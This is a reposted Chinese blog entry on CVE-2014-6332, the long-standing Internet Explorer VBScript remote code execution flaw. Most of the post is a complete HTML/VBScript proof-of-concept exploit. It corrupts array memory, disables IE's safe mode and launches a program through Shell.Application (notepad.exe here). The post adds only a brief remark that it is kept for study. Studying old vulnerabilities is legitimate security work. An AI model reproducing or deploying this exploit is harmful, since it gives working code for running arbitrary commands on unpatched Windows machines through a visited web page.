Win95+IE3 – Win10+IE11全版本执行漏洞(转载)
来源:互联网 发布:程序员简历个人评价 编辑:程序博客网 时间:2024/04/29 13:13
原文来自:http://www.nigesb.com/cve-2014-6332-poc.html
微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞(CVE-2014-6332),可以说是给windows吃了一颗大补丸。缺陷出现在VBScript的代码中,自Windows 95首次发布(19年前)以来就一直存在。袁哥的眼泪哗哗的。随便一个ie,必弹计算器。
//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.https://twitter.com/yuange75http://hi.baidu.com/yuange1975
*//<!doctype html><html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><head></head><body><SCRIPT LANGUAGE="VBScript">
function runmumaa() On Error Resume Nextset shell=createobject("Shell.Application")shell.ShellExecute "notepad.exe"end function
</script><SCRIPT LANGUAGE="VBScript"> dim aa()dim ab()dim a0dim a1dim a2dim a3dim win9xdim intVersiondim rndadim funclassdim myarrayBegin()function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end ifend functionfunction BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5)end functionfunction Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Nextend functionsub testaa()end subfunction mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end functionfunction Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end functionfunction ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0)end function</script></body></html>
在实际攻击中,由于IE自身的安全防护以及杀毒软件的原因,无法直接执行命令。但是,利用方式不仅限于执行命令。留着来学习
0 0
- Win95+IE3 – Win10+IE11全版本执行漏洞(转载)
- Win95+IE3 – Win10+IE11全版本执行漏洞(含POC)
- Win10中卸载IE11
- ECSHOP全版本注入漏洞分析
- ECSHOP全版本注入漏洞分析
- Discuz全版本任意文件删除漏洞
- Struts2漏洞分析,漏洞波及全系版本
- phpwind < v6 版本命令执行漏洞
- win95程序向wince移植【经典转载】win95程序向wince移植【经典转载】
- (转载)SQL注入天书 - ASP注入漏洞全接触
- Wp暴目录漏洞-全版本通杀
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- [分析]-DedeCMS全版本通杀SQL注入漏洞
- metinfo全版本csrf漏洞(可导致重装)
- win10全版本下载地址MSDN纯净版ISO
- 某版本JEECMS后台存在通用struts2命令执行漏洞。
- Apache shiro 1.2.4版本远程命令执行漏洞详解
- vb6判断操作系统版本-从win95到win7
- 没有什么能够阻挡
- HDU-#5108 Alexandra and Prime Numbers
- 08动态内存分配
- 第五章 初始化与清理
- Boring String Problem
- Win95+IE3 – Win10+IE11全版本执行漏洞(转载)
- set setenv
- IOS 图片上传处理 图片压缩 图片处理
- pat 1082. Read Number in Chinese 整数串和字符串转化
- java web项目发送404页面
- sqlmap用户手册
- Cygwin环境下使用Android NDK r9c编译boost 1.55
- ORACLE RMAN异机恢复
- libsvm c++ 简单例子 性别预测